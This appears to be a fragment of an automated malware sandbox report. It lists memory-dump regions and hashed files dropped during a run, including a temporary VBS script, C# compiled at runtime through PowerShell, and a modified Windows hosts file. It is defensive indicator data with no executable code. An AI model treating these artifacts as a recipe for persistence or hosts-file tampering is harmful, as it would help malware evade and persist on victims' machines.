memory/2592-170-0x0000000002880000-0x000000000288C000-memory.dmp
memory/2592-167-0x0000000002840000-0x0000000002850000-memory.dmp
memory/2592-166-0x0000000002830000-0x0000000002838000-memory.dmp
memory/2592-178-0x000000001B420000-0x000000001B42C000-memory.dmp
memory/2592-177-0x000000001B410000-0x000000001B41A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b5ljigho.zcq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5048-261-0x00000270B75E0000-0x00000270B7602000-memory.dmp
memory/2360-262-0x00007FFFE4D00000-0x00007FFFE4D24000-memory.dmp
memory/2360-285-0x00007FFFDD8A0000-0x00007FFFDDA1F000-memory.dmp
memory/5048-308-0x00000270B7650000-0x00000270B779F000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 45f53352160cf0903c729c35c8edfdce |
| SHA1 | b35a4d4fbaf2a3cc61e540fc03516dd70f3c34ab |
| SHA256 | 9cf18d157a858fc143a6de5c2dd3f618516a527b34478ac478d8c94ff027b0d2 |
| SHA512 | e3fa27a80a1df58acb49106c306dab22e5ed582f6b0cd7d9c3ef0a85e9f5919333257e88aa44f42a0e095fd577c9e12a02957a7845c0d109f821f32d8d3343f3 |
memory/4824-314-0x0000028144C80000-0x0000028144DCF000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 627073ee3ca9676911bee35548eff2b8 |
| SHA1 | 4c4b68c65e2cab9864b51167d710aa29ebdcff2e |
| SHA256 | 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c |
| SHA512 | 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb |
\??\c:\Users\Admin\AppData\Local\Temp\g3xs2c0d\g3xs2c0d.cmdline
| MD5 | e2478f5155d28cb1d5676d8e971c4171 |
| SHA1 | d4e74442ee8d7d089b246a5b77b9b65a8bd3d96e |
| SHA256 | 2127ead1f974f8966787dd9bdc132a2b56310dda2c80e0ce4b21737a2662acfb |
| SHA512 | 78ef72ef4eb385973a9cd75dbbb7ab2899b03ec2925e0aa87b2a0ea7621fe1dfc7ee2d8b25b480afb80db9abb266b966ba49ef20d8181ea481c54497ff934c68 |
\??\c:\Users\Admin\AppData\Local\Temp\g3xs2c0d\g3xs2c0d.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
C:\Windows\System32\drivers\etc\hosts
| MD5 | f99e42cdd8b2f9f1a3c062fe9cf6e131 |
| SHA1 | e32bdcab8da0e3cdafb6e3876763cee002ab7307 |
| SHA256 | a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0 |
| SHA512 | c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6 |
\??\c:\Users\Admin\AppData\Local\Temp\g3xs2c0d\CSC1258BA46459645629AF8383C4D4B32DF.TMP
| MD5 | 0703730abdcadf3f61737c0383e34e32 |
| SHA1 | 64fa1857c2837329e1cb91c0e5ed999a1bb64a55 |
| SHA256 | 0a6e699f658c7aecfa5ea5ce9f57047f76da23645d7849c67bdcce5fa689f96b |
| SHA512 | 0f9fb928fa344ce57a508823cf262191037713b585af4a1a4b7255cef4c92acfe46792a1a588405ff250b2d046604ae08b66449e3021bcaacd4e3601bb71fabb |
C:\Users\Admin\AppData\Local\Temp\RESE5.tmp
| MD5 | 39208e54313fcd43a8511f6d6deb4847 |
| SHA1 | bc79617389eaab0b7563ffc545ae9a2e18b740ae |
| SHA256 | 4f5cf32c4ad82f62c3ac28251d2e6c38557dd39d8b2fe54031254bf1b2ae15c2 |
| SHA512 | b44188af372a47c02eb10a0596ae0144f973705487626eeb34ee8d7b3fc1dde0c7f99af94924e067f55a304394bd9947362f665c64ba76494d5fa2791b8667af |
memory/5092-345-0x000002151CFF0000-0x000002151CFF8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\g3xs2c0d\g3xs2c0d.dll
| MD5 | af4131c9dce4b1a83a1b46244da121eb |
| SHA1 | 721873b133af7a17e5e3a9b60be26672e05b3047 |
| SHA256 | 019ce8fdb5afb82485ffc51a288a0d1ea58a03b409071e64eb51761ec00d4960 |
| SHA512 | 182d104edec8b7651742ae7e8340d8a80660dc9a32a91a2b9560995add18a95ad0f5ecf95f1713716ca26d76ecdaf468025d6ebf44e62c15f76e0a3c090c9f70 |
C:\Users\Admin\AppData\Local\Temp\f952880f-c74c-4b19-b008-6f790cefae50.vbs
| MD5 | 64c4edd589033cb8089e9c6e92dd8ab6 |
| SHA1 | 7823043bb88e97c3c3b9a24aa71c691be0f07fc8 |
| SHA256 | 4c0caad9e72fbdd3a5c770f4a7b2c2ef1c3d206862238a4ab7621ef2794dfa38 |
| SHA512 | 7fee793519d648c3d6c49f96afaf8a2ad9dec8a0d0676a388f0b80a601874f178adb71f34203f524f1887155fff52dd4eff64c0963319335c740e1543229154c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | ad0c2c170d8af41eceabc6f203429953 |
| SHA1 | 6b5956063eb61a34aa8858b3fd74488e68345ad4 |
| SHA256 | 8b7de0c3a86d1d8d4839df9ba808e7ee4761ada0020198532bb4bd266ea3aaf5 |
| SHA512 | 315c56b62c953fa19b2b1af79087b11418f044e1d44ebf4f9d7204462b96a130cc6c82714c743e7e3ad44712fa77d65b6c10032eb6d230a63b44e90f3bebbd5a |
memory/5092-353-0x0000021535220000-0x000002153536F000-memory.dmp
memory/2360-356-0x00007FFFDEF10000-0x00007FFFDEFDE000-memory.dmp
memory/2360-355-0x00007FFFCE0E0000-0x00007FFFCE613000-memory.dmp
memory/2360-354-0x00007FFFDFA40000-0x00007FFFDFA73000-memory.dmp
memory/2804-364-0x0000019576990000-0x0000019576ADF000-memory.dmp
memory/5016-366-0x000002E7519A0000-0x000002E751AEF000-memory.dmp
memory/2360-367-0x00007FFFDEFE0000-0x00007FFFDF6A5000-memory.dmp
memory/2360-381-0x00007FFFDD780000-0x00007FFFDD89A000-memory.dmp
memory/3716-435-0x000001B19F6E0000-0x000001B19F82F000-memory.dmp
memory/1692-445-0x00000221DBDA0000-0x00000221DBEEF000-memory.dmp
memory/2360-447-0x00007FFFDEFE0000-0x00007FFFDF6A5000-memory.dmp
memory/2360-453-0x00007FFFDD8A0000-0x00007FFFDDA1F000-memory.dmp
memory/2360-448-0x00007FFFE4D80000-0x00007FFFE4DA5000-memory.dmp
memory/2324-471-0x000001931E360000-0x000001931E4AF000-memory.dmp
memory/3144-481-0x000001BE39E80000-0x000001BE39FCF000-memory.dmp
memory/2360-504-0x00007FFFE4C90000-0x00007FFFE4CA9000-memory.dmp
memory/2360-502-0x00007FFFE4D00000-0x00007FFFE4D24000-memory.dmp
memory/2360-506-0x00007FFFDFA40000-0x00007FFFDFA73000-memory.dmp
memory/2360-511-0x00007FFFDD780000-0x00007FFFDD89A000-memory.dmp
memory/2360-510-0x00007FFFE4C70000-0x00007FFFE4C7D000-memory.dmp
memory/2360-509-0x00007FFFE3A60000-0x00007FFFE3A74000-memory.dmp
memory/2360-508-0x00007FFFDEF10000-0x00007FFFDEFDE000-memory.dmp
memory/2360-507-0x00007FFFCE0E0000-0x00007FFFCE613000-memory.dmp
memory/2360-505-0x00007FFFE4C80000-0x00007FFFE4C8D000-memory.dmp
memory/2360-501-0x00007FFFE4D30000-0x00007FFFE4D4A000-memory.dmp
memory/2360-500-0x00007FFFE4D50000-0x00007FFFE4D7D000-memory.dmp
memory/2360-499-0x00007FFFE8E90000-0x00007FFFE8E9F000-memory.dmp
memory/2360-498-0x00007FFFE4D80000-0x00007FFFE4DA5000-memory.dmp
memory/2360-497-0x00007FFFDEFE0000-0x00007FFFDF6A5000-memory.dmp
memory/2360-503-0x00007FFFDD8A0000-0x00007FFFDDA1F000-memory.dmp